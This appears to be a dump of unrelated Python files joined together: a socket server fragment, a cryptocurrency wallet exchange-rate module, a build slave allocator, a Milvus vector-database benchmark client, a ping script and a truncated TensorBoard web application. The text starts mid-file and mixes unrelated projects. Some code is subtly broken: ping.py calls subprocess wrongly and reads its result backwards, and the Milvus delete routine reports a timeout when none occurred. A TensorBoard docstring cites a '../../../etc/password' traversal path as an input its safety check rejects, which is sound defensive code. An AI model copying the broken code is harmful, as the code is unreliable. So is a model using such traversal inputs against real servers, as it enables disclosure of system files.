# self.socket.bind((self.hostname, self.port))
self.socket.bind((self.hostname, self.port))
self.socket.listen(10)
while True:
threading.Thread(target=handle, args=(self.socket.accept())).start()
if __name__ == '__main__':
server = Server(hostname=HOST, port=PORT)
server.start()
|
exchange_rate.py | from datetime import datetime
import inspect
import requests
import sys
import os
import json
from threading import Thread
import time
import csv
import decimal
from decimal import Decimal
from .bitcoin import COIN
from .i18n import _
from .util import PrintError, ThreadJob
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {}
'''
{'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0}
'''
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'}, timeout=10)
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'})
reader = csv.DictReader(response.content.decode().split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
t.setDaemon(True)
t.start()
def read_historical_rates(self, ccy, cache_dir):
filename = os.path.join(cache_dir, self.name() + '_'+ ccy)
if os.path.exists(filename):
timestamp = os.stat(filename).st_mtime
try:
with open(filename, 'r', encoding='utf-8') as f:
h = json.loads(f.read())
h['timestamp'] = timestamp
except:
h = None
else:
h = None
if h:
self.history[ccy] = h
self.on_history()
return h
def get_historical_rates_safe(self, ccy, cache_dir):
try:
self.print_error("requesting fx history for", ccy)
h = self.request_history(ccy)
self.print_error("received fx history for", ccy)
except BaseException as e:
self.print_error("failed fx history:", e)
return
filename = os.path.join(cache_dir, self.name() + '_' + ccy)
with open(filename, 'w', encoding='utf-8') as f:
f.write(json.dumps(h))
h['timestamp'] = time.time()
self.history[ccy] = h
self.on_history()
def get_historical_rates(self, ccy, cache_dir):
if ccy not in self.history_ccys():
return
h = self.history.get(ccy)
if h is None:
h = self.read_historical_rates(ccy, cache_dir)
if h is None or h['timestamp'] < time.time() - 24*3600:
t = Thread(target=self.get_historical_rates_safe, args=(ccy, cache_dir))
t.setDaemon(True)
t.start()
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'), 'NaN')
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a)==3])
class CoinMarketCap(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinmarketcap.com',
"/v1/ticker/primecoin?convert=%s")
return {'USD': Decimal(json[0]['price_usd'])}
def dictinvert(d):
inv = {}
for k, vlist in d.items():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
def get_exchanges_and_currencies():
import os, json
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
try:
with open(path, 'r', encoding='utf-8') as f:
return json.loads(f.read())
except:
pass
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
print(name, "ok")
except:
print(name, "error")
continue
with open(path, 'w', encoding='utf-8') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.cache_dir = os.path.join(config.path, 'cache')
self.set_exchange(self.config_exchange())
if not os.path.exists(self.cache_dir):
os.mkdir(self.cache_dir)
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas):
prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
try:
rounded_amount = round(amount, prec)
except decimal.InvalidOperation:
rounded_amount = amount
return fmt_str.format(rounded_amount)
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
if self.timeout ==0 and self.show_history():
self.exchange.get_historical_rates(self.ccy, self.cache_dir)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_history_capital_gains_config(self):
return bool(self.config.get('history_rates_capital_gains', False))
def set_history_capital_gains_config(self, b):
self.config.set_key('history_rates_capital_gains', bool(b))
def get_fiat_address_config(self):
return bool(self.config.get('fiat_address'))
def set_fiat_address_config(self, b):
self.config.set_key('fiat_address', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", "EUR")
def config_exchange(self):
return self.config.get('use_exchange', 'BitcoinAverage')
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, CoinMarketCap)
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
self.exchange.read_historical_rates(self.ccy, self.cache_dir)
def on_quotes(self):
if self.network:
self.network.trigger_callback('on_quotes')
def on_history(self):
if self.network:
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate is None:
return Decimal('NaN')
return Decimal(rate)
def format_amount(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s" % self.value_str(btc_balance, rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate.is_nan() else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)
def fiat_value(self, satoshis, rate):
return Decimal('NaN') if satoshis is None else Decimal(satoshis) / COIN * Decimal(rate)
def value_str(self, satoshis, rate):
return self.format_fiat(self.fiat_value(satoshis, rate))
def format_fiat(self, value):
if value.is_nan():
return _("No data")
return "%s" % (self.ccy_amount_str(value, True))
def history_rate(self, d_t):
if d_t is None:
return Decimal('NaN')
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate == 'NaN' and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy, 'NaN')
self.history_used_spot = True
return Decimal(rate)
def historical_value_str(self, satoshis, d_t):
return self.format_fiat(self.historical_value(satoshis, d_t))
def historical_value(self, satoshis, d_t):
return self.fiat_value(satoshis, self.history_rate(d_t))
def timestamp_rate(self, timestamp):
from .util import timestamp_to_datetime
date = timestamp_to_datetime(timestamp)
return self.history_rate(date)
|
slave_allocator.py | from app.util.log import get_logger
from app.util.ordered_set_queue import OrderedSetQueue
from app.util.safe_thread import SafeThread
from app.master.slave import SlaveMarkedForShutdownError
class SlaveAllocator(object):
"""
The SlaveAllocator class is responsible for allocating slaves to prepared builds.
"""
def __init__(self, scheduler_pool):
"""
:type scheduler_pool: app.master.build_scheduler_pool.BuildSchedulerPool
"""
self._logger = get_logger(__name__)
self._scheduler_pool = scheduler_pool
self._idle_slaves = OrderedSetQueue()
self._allocation_thread = SafeThread(
target=self._slave_allocation_loop, name='SlaveAllocationLoop', daemon=True)
def start(self):
"""
Start the infinite loop that will pull off prepared builds from a synchronized queue
and allocate them slaves.
"""
if self._allocation_thread.is_alive():
raise RuntimeError('Error: slave allocation loop was asked to start when its already running.')
self._allocation_thread.start()
def _slave_allocation_loop(self):
"""
Builds wait in line for more slaves. This method executes in the background on another thread and
watches for idle slaves, then gives them out to the waiting builds.
"""
while True:
# This is a blocking call that will block until there is a prepared build.
build_scheduler = self._scheduler_pool.next_prepared_build_scheduler()
while build_scheduler.needs_more_slaves():
claimed_slave = self._idle_slaves.get()
# Remove dead and shutdown slaves from the idle queue
if claimed_slave.is_shutdown() or not claimed_slave.is_alive(use_cached=False):
continue
# The build may have completed while we were waiting for an idle slave, so check one more time.
if build_scheduler.needs_more_slaves():
# Potential race condition here! If the build completes after the if statement is checked,
# a slave will be allocated needlessly (and run slave.setup(), which can be significant work).
self._logger.info('Allocating {} to build {}.', claimed_slave, build_scheduler.build_id)
build_scheduler.allocate_slave(claimed_slave)
else:
self.add_idle_slave(claimed_slave)
self._logger.info('Done allocating slaves for build {}.', build_scheduler.build_id)
def add_idle_slave(self, slave):
"""
Add a slave to the idle queue.
:type slave: Slave
"""
try:
slave.mark_as_idle()
self._idle_slaves.put(slave)
except SlaveMarkedForShutdownError:
pass
|
client.py | import pdb
import random
import logging
import json
import sys
import time, datetime
from multiprocessing import Process
from milvus import Milvus, IndexType, MetricType
logger = logging.getLogger("milvus_benchmark.client")
SERVER_HOST_DEFAULT = "127.0.0.1"
SERVER_PORT_DEFAULT = 19530
def time_wrapper(func):
"""
This decorator prints the execution time for the decorated function.
"""
def wrapper(*args, **kwargs):
start = time.time()
result = func(*args, **kwargs)
end = time.time()
logger.info("Milvus {} run in {}s".format(func.__name__, round(end - start, 2)))
return result
return wrapper
class MilvusClient(object):
def __init__(self, table_name=None, ip=None, port=None):
self._milvus = Milvus()
self._table_name = table_name
try:
if not ip:
self._milvus.connect(
host = SERVER_HOST_DEFAULT,
port = SERVER_PORT_DEFAULT)
else:
self._milvus.connect(
host = ip,
port = port)
except Exception as e:
raise e
def __str__(self):
return 'Milvus table %s' % self._table_name
def check_status(self, status):
if not status.OK():
logger.error(status.message)
raise Exception("Status not ok")
def create_table(self, table_name, dimension, index_file_size, metric_type):
if not self._table_name:
self._table_name = table_name
if metric_type == "l2":
metric_type = MetricType.L2
elif metric_type == "ip":
metric_type = MetricType.IP
else:
logger.error("Not supported metric_type: %s" % metric_type)
create_param = {'table_name': table_name,
'dimension': dimension,
'index_file_size': index_file_size,
"metric_type": metric_type}
status = self._milvus.create_table(create_param)
self.check_status(status)
@time_wrapper
def insert(self, X, ids=None):
status, result = self._milvus.add_vectors(self._table_name, X, ids)
self.check_status(status)
return status, result
@time_wrapper
def create_index(self, index_type, nlist):
if index_type == "flat":
index_type = IndexType.FLAT
elif index_type == "ivf_flat":
index_type = IndexType.IVFLAT
elif index_type == "ivf_sq8":
index_type = IndexType.IVF_SQ8
elif index_type == "mix_nsg":
index_type = IndexType.MIX_NSG
elif index_type == "ivf_sq8h":
index_type = IndexType.IVF_SQ8H
index_params = {
"index_type": index_type,
"nlist": nlist,
}
logger.info("Building index start, table_name: %s, index_params: %s" % (self._table_name, json.dumps(index_params)))
status = self._milvus.create_index(self._table_name, index=index_params, timeout=6*3600)
self.check_status(status)
def describe_index(self):
return self._milvus.describe_index(self._table_name)
def drop_index(self):
logger.info("Drop index: %s" % self._table_name)
return self._milvus.drop_index(self._table_name)
@time_wrapper
def query(self, X, top_k, nprobe):
status, result = self._milvus.search_vectors(self._table_name, top_k, nprobe, X)
self.check_status(status)
return status, result
def count(self):
return self._milvus.get_table_row_count(self._table_name)[1]
def delete(self, timeout=60):
logger.info("Start delete table: %s" % self._table_name)
self._milvus.delete_table(self._table_name)
i = 0
while i < timeout:
if self.count():
time.sleep(1)
i = i + 1
continue
else:
break
if i < timeout:
logger.error("Delete table timeout")
def describe(self):
return self._milvus.describe_table(self._table_name)
def exists_table(self):
return self._milvus.has_table(self._table_name)
@time_wrapper
def preload_table(self):
return self._milvus.preload_table(self._table_name, timeout=3000)
def fit(table_name, X):
milvus = Milvus()
milvus.connect(host = SERVER_HOST_DEFAULT, port = SERVER_PORT_DEFAULT)
start = time.time()
status, ids = milvus.add_vectors(table_name, X)
end = time.time()
logger(status, round(end - start, 2))
def fit_concurrent(table_name, process_num, vectors):
processes = []
for i in range(process_num):
p = Process(target=fit, args=(table_name, vectors, ))
processes.append(p)
p.start()
for p in processes:
p.join()
if __name__ == "__main__":
# table_name = "sift_2m_20_128_l2"
table_name = "test_tset1"
m = MilvusClient(table_name)
# m.create_table(table_name, 128, 50, "l2")
print(m.describe())
# print(m.count())
# print(m.describe_index())
insert_vectors = [[random.random() for _ in range(128)] for _ in range(10000)]
for i in range(5):
m.insert(insert_vectors)
print(m.create_index("ivf_sq8h", 16384))
X = [insert_vectors[0]]
top_k = 10
nprobe = 10
print(m.query(X, top_k, nprobe))
# # # print(m.drop_index())
# # print(m.describe_index())
# # sys.exit()
# # # insert_vectors = [[random.random() for _ in range(128)] for _ in range(100000)]
# # # for i in range(100):
# # # m.insert(insert_vectors)
# # # time.sleep(5)
# # # print(m.describe_index())
# # # print(m.drop_index())
# # m.create_index("ivf_sq8h", 16384)
# print(m.count())
# print(m.describe_index())
# sys.exit()
# print(m.create_index("ivf_sq8h", 16384))
# print(m.count())
# print(m.describe_index())
import numpy as np
def mmap_fvecs(fname):
x = np.memmap(fname, dtype='int32', mode='r')
d = x[0]
return x.view('float32').reshape(-1, d + 1)[:, 1:]
print(mmap_fvecs("/poc/deep1b/deep1B_queries.fvecs"))
# SIFT_SRC_QUERY_DATA_DIR = '/poc/yuncong/ann_1000m'
# file_name = SIFT_SRC_QUERY_DATA_DIR+'/'+'query.npy'
# data = numpy.load(file_name)
# query_vectors = data[0:2].tolist()
# print(len(query_vectors))
# results = m.query(query_vectors, 10, 10)
# result_ids = []
# for result in results[1]:
# tmp = []
# for item in result:
# tmp.append(item.id)
# result_ids.append(tmp)
# print(result_ids[0][:10])
# # gt
# file_name = SIFT_SRC_QUERY_DATA_DIR+"/gnd/"+"idx_1M.ivecs"
# a = numpy.fromfile(file_name, dtype='int32')
# d = a[0]
# true_ids = a.reshape(-1, d + 1)[:, 1:].copy()
# print(true_ids[:3, :2])
# print(len(true_ids[0]))
# import numpy as np
# import sklearn.preprocessing
# def mmap_fvecs(fname):
# x = np.memmap(fname, dtype='int32', mode='r')
# d = x[0]
# return x.view('float32').reshape(-1, d + 1)[:, 1:]
# data = mmap_fvecs("/poc/deep1b/deep1B_queries.fvecs")
# print(data[0], len(data[0]), len(data))
# total_size = 10000
# # total_size = 1000000000
# file_size = 1000
# # file_size = 100000
# file_num = total_size // file_size
# for i in range(file_num):
# fname = "/test/milvus/raw_data/deep1b/binary_96_%05d" % i
# print(fname, i*file_size, (i+1)*file_size)
# single_data = data[i*file_size : (i+1)*file_size]
# single_data = sklearn.preprocessing.normalize(single_data, axis=1, norm='l2')
# np.save(fname, single_data)
|
ping.py | #!/usr/local/bin/python
# -*- coding=utf-8 -*-
from __future__ import print_function
import subprocess
import threading
def is_reacheable(ip):
if subprocess.call(["ping"], "-c", "1", ip):
print("{0} is alive".format(ip))
else:
print("{0} is unreacheable".format(ip))
def main():
# file_object = open('ips.txt')
# try:
# str = file_object.read()
# print(str)
# finally:
# file_object.close()
with open('ips.txt') as f:
lines = f.readlines()
print(lines)
threads = []
for line in lines:
print(line)
# thr = threading.Thread(target=is_reacheable, args=(line, ))
# thr.start()
# threads.append(thr)
# for thr in threads:
# thr.join()
if __name__ == '__main__':
main() |
application.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorBoard WSGI Application Logic.
TensorBoardApplication constructs TensorBoard as a WSGI application.
It handles serving static assets, and implements TensorBoard data APIs.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import imghdr
import mimetypes
import os
import re
import threading
import time
import six
from six import StringIO
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
from six.moves.urllib import parse as urlparse
from werkzeug import wrappers
from tensorflow.python.platform import resource_loader
from tensorflow.python.platform import tf_logging as logging
from tensorflow.tensorboard.backend import process_graph
from tensorflow.tensorboard.backend.event_processing import event_accumulator
from tensorflow.tensorboard.backend.event_processing import event_multiplexer
from tensorflow.tensorboard.lib.python import http_util
from tensorflow.tensorboard.plugins.debugger import debugger_plugin
from tensorflow.tensorboard.plugins.projector import projector_plugin
DEFAULT_SIZE_GUIDANCE = {
event_accumulator.COMPRESSED_HISTOGRAMS: 500,
event_accumulator.IMAGES: 10,
event_accumulator.AUDIO: 10,
event_accumulator.SCALARS: 1000,
event_accumulator.HEALTH_PILLS: 100,
event_accumulator.HISTOGRAMS: 50,
}
DATA_PREFIX = '/data'
LOGDIR_ROUTE = '/logdir'
RUNS_ROUTE = '/runs'
PLUGIN_PREFIX = '/plugin'
SCALARS_ROUTE = '/' + event_accumulator.SCALARS
IMAGES_ROUTE = '/' + event_accumulator.IMAGES
AUDIO_ROUTE = '/' + event_accumulator.AUDIO
HISTOGRAMS_ROUTE = '/' + event_accumulator.HISTOGRAMS
COMPRESSED_HISTOGRAMS_ROUTE = '/' + event_accumulator.COMPRESSED_HISTOGRAMS
INDIVIDUAL_IMAGE_ROUTE = '/individualImage'
INDIVIDUAL_AUDIO_ROUTE = '/individualAudio'
GRAPH_ROUTE = '/' + event_accumulator.GRAPH
RUN_METADATA_ROUTE = '/' + event_accumulator.RUN_METADATA
TAB_ROUTES = ['', '/events', '/images', '/audio', '/graphs', '/histograms']
_IMGHDR_TO_MIMETYPE = {
'bmp': 'image/bmp',
'gif': 'image/gif',
'jpeg': 'image/jpeg',
'png': 'image/png'
}
_DEFAULT_IMAGE_MIMETYPE = 'application/octet-stream'
def _content_type_for_image(encoded_image_string):
image_type = imghdr.what(None, encoded_image_string)
return _IMGHDR_TO_MIMETYPE.get(image_type, _DEFAULT_IMAGE_MIMETYPE)
class _OutputFormat(object):
"""An enum used to list the valid output formats for API calls.
Not all API calls support all formats (for example, only scalars and
compressed histograms support CSV).
"""
JSON = 'json'
CSV = 'csv'
def standard_tensorboard_wsgi(logdir, purge_orphaned_data, reload_interval):
"""Construct a TensorBoardWSGIApp with standard plugins and multiplexer."""
multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=DEFAULT_SIZE_GUIDANCE,
purge_orphaned_data=purge_orphaned_data)
plugins = {
debugger_plugin.PLUGIN_PREFIX_ROUTE:
debugger_plugin.DebuggerPlugin(multiplexer),
projector_plugin.PLUGIN_PREFIX_ROUTE:
projector_plugin.ProjectorPlugin(),
}
return TensorBoardWSGIApp(logdir, plugins, multiplexer, reload_interval)
class TensorBoardWSGIApp(object):
"""The TensorBoard application, conforming to WSGI spec."""
# How many samples to include in sampling API calls by default.
DEFAULT_SAMPLE_COUNT = 10
# NOTE TO MAINTAINERS: An accurate Content-Length MUST be specified on all
# responses using send_header.
protocol_version = 'HTTP/1.1'
def __init__(self, logdir, plugins, multiplexer, reload_interval):
"""Constructs the TensorBoard application.
Args:
logdir: the logdir spec that describes where data will be loaded.
may be a directory, or comma,separated list of directories, or colons
can be used to provide named directories
plugins: Map from plugin name to plugin application
multiplexer: The EventMultiplexer with TensorBoard data to serve
reload_interval: How often (in seconds) to reload the Multiplexer
Returns:
A WSGI application that implements the TensorBoard backend.
"""
self._logdir = logdir
self._plugins = plugins
self._multiplexer = multiplexer
self.tag = get_tensorboard_tag()
path_to_run = parse_event_files_spec(self._logdir)
if reload_interval:
start_reloading_multiplexer(self._multiplexer, path_to_run,
reload_interval)
else:
reload_multiplexer(self._multiplexer, path_to_run)
self.data_applications = {
DATA_PREFIX + LOGDIR_ROUTE:
self._serve_logdir,
DATA_PREFIX + SCALARS_ROUTE:
self._serve_scalars,
DATA_PREFIX + GRAPH_ROUTE:
self._serve_graph,
DATA_PREFIX + RUN_METADATA_ROUTE:
self._serve_run_metadata,
DATA_PREFIX + HISTOGRAMS_ROUTE:
self._serve_histograms,
DATA_PREFIX + COMPRESSED_HISTOGRAMS_ROUTE:
self._serve_compressed_histograms,
DATA_PREFIX + IMAGES_ROUTE:
self._serve_images,
DATA_PREFIX + INDIVIDUAL_IMAGE_ROUTE:
self._serve_image,
DATA_PREFIX + AUDIO_ROUTE:
self._serve_audio,
DATA_PREFIX + INDIVIDUAL_AUDIO_ROUTE:
self._serve_individual_audio,
DATA_PREFIX + RUNS_ROUTE:
self._serve_runs,
'/app.js':
self._serve_js
}
# Serve the routes from the registered plugins using their name as the route
# prefix. For example if plugin z has two routes /a and /b, they will be
# served as /data/plugin/z/a and /data/plugin/z/b.
for name in self._plugins:
try:
plugin = self._plugins[name]
plugin_apps = plugin.get_plugin_apps(self._multiplexer.RunPaths(),
self._logdir)
except Exception as e: # pylint: disable=broad-except
logging.warning('Plugin %s failed. Exception: %s', name, str(e))
continue
for route, app in plugin_apps.items():
path = DATA_PREFIX + PLUGIN_PREFIX + '/' + name + route
self.data_applications[path] = app
# We use underscore_names for consistency with inherited methods.
def _image_response_for_run(self, run_images, run, tag):
"""Builds a JSON-serializable object with information about run_images.
Args:
run_images: A list of event_accumulator.ImageValueEvent objects.
run: The name of the run.
tag: The name of the tag the images all belong to.
Returns:
A list of dictionaries containing the wall time, step, URL, width, and
height for each image.
"""
response = []
for index, run_image in enumerate(run_images):
response.append({
'wall_time': run_image.wall_time,
'step': run_image.step,
# We include the size so that the frontend can add that to the <img>
# tag so that the page layout doesn't change when the image loads.
'width': run_image.width,
'height': run_image.height,
'query': self._query_for_individual_image(run, tag, index)
})
return response
def _audio_response_for_run(self, run_audio, run, tag):
"""Builds a JSON-serializable object with information about run_audio.
Args:
run_audio: A list of event_accumulator.AudioValueEvent objects.
run: The name of the run.
tag: The name of the tag the images all belong to.
Returns:
A list of dictionaries containing the wall time, step, URL, and
content_type for each audio clip.
"""
response = []
for index, run_audio_clip in enumerate(run_audio):
response.append({
'wall_time': run_audio_clip.wall_time,
'step': run_audio_clip.step,
'content_type': run_audio_clip.content_type,
'query': self._query_for_individual_audio(run, tag, index)
})
return response
def _path_is_safe(self, path):
"""Check path is safe (stays within current directory).
This is for preventing directory-traversal attacks.
Args:
path: The path to check for safety.
Returns:
True if the given path stays within the current directory, and false
if it would escape to a higher directory. E.g. _path_is_safe('index.html')
returns true, but _path_is_safe('../../../etc/password') returns false.
"""
base = os.path.abspath(os.curdir)
absolute_path = os.path.abspath(path)
prefix = os.path.commonprefix([base, absolute_path])
return prefix == base
@wrappers.Request.application
def _serve_logdir(self, request):
"""Respond with a JSON object containing this TensorBoard's logdir."""
return http_util.Respond(
request, {'logdir': self._logdir}, 'application/json')
@wrappers.Request.application
def _serve_scalars(self, request):
"""Given a tag and single run, return array of ScalarEvents."""
# TODO(cassandrax): return HTTP status code for malformed requests
tag = request.args.get('tag')
run = request.args.get('run')
values = self._multiplexer.Scalars(run, tag)
if request.args.get('format') == _OutputFormat.CSV:
string_io = StringIO()
writer = csv.writer(string_io)
writer.writerow(['Wall time', 'Step', 'Value'])
writer.writerows(values)
return http_util.Respond(request, string_io.getvalue(), 'text/csv')
else:
return http_util.Respond(request, values, 'application/json')
@wrappers.Request.application
def _serve_graph(self, request):
"""Given a single run, return the graph definition in json format."""
run = request.args.get('run', None)
if run is None:
return http_util.Respond(
request, 'query parameter "run" is required', 'text/plain', 400)
try:
graph = self._multiplexer.Graph(run)
except ValueError:
return http_util.Respond(request, '404 Not Found', code=404)
limit_attr_size = request.args.get('limit_attr_size', None)
if limit_attr_size is not None:
try:
limit_attr_size = int(limit_attr_size)
except ValueError:
return http_util.Respond(
request, 'query parameter `limit_attr_size` must be integer',
'text/plain', 400)
large_attrs_key = request.args.get('large_attrs_key', None)
try:
process_graph.prepare_graph_for_ui(graph, limit_attr_size,
large_attrs_key)
except ValueError as e:
return http_util.Respond(request, e.message, 'text/plain', 400)
return http_util.Respond(request, str(graph), 'text/x-protobuf') # pbtxt
@wrappers.Request.application
def _serve_run_metadata(self, request):
"""Given a tag and a TensorFlow run, return the session.run() metadata."""
tag = request.args.get('tag', None)
run = request.args.get('run', None)
if tag is None:
return http_util.Respond(
request, 'query parameter "tag" is required', 'text/plain', 400)
if run is None:
return http_util.Respond(
request, 'query parameter "run" is required', 'text/plain', 400)
try:
run_metadata = self._multiplexer.RunMetadata(run, tag)
except ValueError:
return http_util.Respond(request, '404 Not Found', code=404)
return http_util.Respond(
request, str(run_metadata), 'text/x-protobuf') # pbtxt
@wrappers.Request.application
def _serve_histograms(self, request):
"""Given a tag and single run, return an array of histogram values."""
tag = request.args.get('tag')
run = request.args.get('run')
values = self._multiplexer.Histograms(run, tag)
return http_util.Respond(request, values, 'application/json')
@wrappers.Request.application
def _serve_compressed_histograms(self, request):
"""Given a tag and single run, return an array of compressed histograms."""
tag = request.args.get('tag')
run = request.args.get('run')
compressed_histograms = self._multiplexer.CompressedHistograms(run, tag)
if request.args.get('format') == _OutputFormat.CSV:
string_io = StringIO()
writer = csv.writer(string_io)
# Build the headers; we have two columns for timing and two columns for
# each compressed histogram bucket.
headers = ['Wall time', 'Step']
if compressed_histograms:
bucket_count = len(compressed_histograms[0].compressed_histogram_values)
for i in xrange(bucket_count):
headers += ['Edge %d basis points' % i, 'Edge %d value' % i]
writer.writerow(headers)
for compressed_histogram in compressed_histograms:
row = [compressed_histogram.wall_time, compressed_histogram.step]
for value in compressed_histogram.compressed_histogram_values:
row += [value.rank_in_bps, value.value]
writer.writerow(row)
return http_util.Respond(request, string_io.getvalue(), 'text/csv')
else:
return http_util.Respond(
request, compressed_histograms, 'application/json')
@wrappers.Request.application
def _serve_images(self, request):
"""Given a tag and list of runs, serve a list of images.
Note that the images themselves are not sent; instead, we respond with URLs
to the images. The frontend should treat these URLs as opaque and should not
try to parse information about them or generate them itself, as the format
may change.
Args:
request: A werkzeug.wrappers.Request object.
Returns:
A werkzeug.Response application.
"""
tag = request.args.get('tag')
run = request.args.get('run')
images = self._multiplexer.Images(run, tag)
response = self._image_response_for_run(images, run, tag)
return http_util.Respond(request, response, 'application/json')
@wrappers.Request.application
def _serve_image(self, request):
"""Serves an individual image."""
tag = request.args.get('tag')
run = request.args.get('run')
index = int(request.args.get('index'))
image = self._multiplexer.Images(run, tag)[index]
encoded_image_string = image.encoded_image_string
content_type = _content_type_for_image(encoded_image_string)
return http_util.Respond(request, encoded_image_string, content_type)
def _query_for_individual_image(self, run, tag, index):
"""Builds a URL for accessing the specified image.
This should be kept in sync with _serve_image. Note that the URL is *not*
guaranteed to always return the same image, since images may be unloaded
from the reservoir as new images come in.
Args:
run: The name of the run.
tag: The tag.
index: The index of the image. Negative values are OK.
Returns:
A string representation of a URL that will load the index-th
sampled image in the given run with the given tag.
"""
query_string = urllib.parse.urlencode({
'run': run,
'tag': tag,
'index': index
})
return query_string
@wrappers.Request.application
def _serve_audio(self, request):
"""Given a tag and list of runs, serve a list of audio.
Note that the audio clips themselves are not sent; instead, we respond with
URLs to the audio. The frontend should treat these URLs as opaque and should
not try to parse information about them or generate them itself, as the
format may change.
Args:
request: A werkzeug.wrappers.Request object.
Returns:
A werkzeug.Response application.
"""
tag = request.args.get('tag')
run = request.args.get('run')
audio_list = self._multiplexer.Audio(run, tag)
response = self._audio_response_for_run(audio_list, run, tag)
return http_util.Respond(request, response, 'application/json')
@wrappers.Request.application
def _serve_individual_audio(self, request):
"""Serves an individual audio clip."""
tag = request.args.get('tag')
run = request.args.get('run')
index = int(request.args.get('index'))
audio = self._multiplexer.Audio(run, tag)[index]
return http_util.Respond(
request, audio.encoded_audio_string, audio.content_type)
def _query_for_individual_audio(self, run, tag, index):
"""Builds a URL for accessing the specified audio.
This should be kept in sync with _serve_individual_audio. Note that the URL
is *not* guaranteed to always return the same audio, since audio may be
unloaded from the reservoir as new audio comes in.
Args:
run: The name of the run.
tag: The tag.
index: The index of the audio. Negative values are OK.
Returns:
A string representation of a URL that will load the index-th
sampled audio in the given run with the given tag.
"""
query_string = urllib.parse.urlencode({
'run': run,
'tag': tag,
'index': index
})
return query_string
@wrappers.Request.application
def _serve_runs(self, request):
"""WSGI app serving a JSON object about runs and tags.
Returns a mapping from runs to tagType to list of tags for that run.
Args:
